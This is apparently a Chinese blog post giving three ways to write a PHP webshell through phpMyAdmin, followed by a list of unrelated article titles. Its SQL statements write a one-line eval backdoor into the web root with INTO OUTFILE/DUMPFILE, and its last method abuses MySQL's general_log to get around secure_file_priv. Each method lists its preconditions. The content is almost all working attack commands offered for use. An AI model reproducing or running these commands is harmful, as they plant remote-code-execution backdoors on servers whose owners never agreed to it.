phpAdmin写webshell的方法
一、常规导入shell的操作
创建数据表导出shell
CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );
INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘<?php @eval($_POST[pass]);?>’);
SELECT `content` FROM `shadow9` INTO OUTFILE ‘C:\\phpStudy\\WWW\\90sec.php’;
DROP TABLE IF EXISTS `shadow9`;
Ps:(1)利用条件secure_file_priv=(未写路径)
(2)知道目标的绝对路径
二、一句话导出shell:
select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstudy/www/90sec.php';
select '<?php @eval($_POST[pass]);?>' into outfile 'c:\\phpstudy\\www\\90sec.php';
select '<?php @eval($_POST[pass]);?>' into dumpfile 'c:\\phpstudy\\www\\bypass.php';
Ps:(1)利用条件secure_file_priv=(未写路径)
(2)知道目标的绝对路径
三、日志备份获取shell
show global variables like "%genera%"; //查询general_log配置
set global general_log='on'; //开启general log模式
SET global general_log_file='D:/phpStudy/WWW/cmd.php'; //设置日志文件保存路径
SELECT '<?php phpinfo();?>'; //phpinfo()写入日志文件
set global general_log='off'; //关闭general_log模式
Ps:(1)可以绕过secure_file_priv=
(2)知道目标的绝对路径
最新文章
- JavaScript知识结构图
- 使用jOrgChart插件, 异步加载生成组织架构图
- Jenkins学习九:Jenkins插件之构建MSBuild
- 1207.1——C语言 函数
- php_PHP与Mysql的连接
- Java 学习笔记 (四) Java 语句优化
- Python学习笔记1 -- TypeError: 'str' object is not callable
- sprd测试系统跑vts
- [大数据面试题]hadoop核心知识点
- javascript删除cookie
- ubuntu-docker入门到放弃(七)Dockerfile简介
- ubuntu apache2下目录结构以及重写规则
- Expression #1 of ORDER BY clause is not in GROUP BY clause and contains nonaggregated column 'information_schema.PROFILING.SEQ' which is not functionally dependent on columns in GROUP BY clause; this
- keystone令牌三种生成方式
- [转载]Docker 完全指南
- Select、Poll与Epoll比較
- 1003 Emergency (25 分)
- 42. linux下数据库服务启动
- firebug chrome debug[z]
- Hadoop(1)-CentOS6.8的安装,配置和克隆